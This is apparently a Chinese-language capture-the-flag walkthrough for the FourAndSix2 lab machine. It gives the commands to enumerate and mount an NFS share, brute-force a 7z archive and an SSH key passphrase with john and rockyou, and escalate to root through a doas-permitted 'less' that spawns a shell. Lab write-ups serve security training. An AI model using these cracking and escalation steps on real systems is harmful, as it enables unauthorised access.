跳转至

FourAndSix2

user shell

目标IP:192.168.205.134

端口信息

22/tcp   open  ssh     OpenSSH 7.9 (protocol 2.0)
111/tcp  open  rpcbind 2 (RPC #100000)
2049/tcp open  nfs     2-3 (RPC #100003)

发现nfs

https://book.hacktricks.xyz/network-services-pentesting/nfs-service-pentesting

挂载到本地,发现backup.7z,使用工具https://github.com/cyberblackhole/7zip-crack爆破得出密码chocolate

解压得到文件id_rsa和id_rsa.pub猜测是通过私钥登录

爆破id_rsa的passphare

ssh2john id_rsa>id_rsa.hash
john -wordlist /bin/rockyou.txt --format=ssh id_rsa.hash

得到id_rsa:12345678

登录ssh

ssh -i id_rsa user@fourandsix2

root shell

枚举

fourandsix2$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/doas
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/passwd
/usr/bin/su
/usr/libexec/lockspool
/usr/libexec/ssh-keysign
/usr/sbin/authpf
/usr/sbin/authpf-noip
/usr/sbin/pppd
/usr/sbin/traceroute
/usr/sbin/traceroute6
/sbin/ping
/sbin/ping6
/sbin/shutdown
fourandsix2$ cat /etc/doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root

提权

doas /usr/bin/less /var/log/authlog
v
:sh

https://gtfobins.github.io/gtfobins/less/

实际上相当于less的suid提权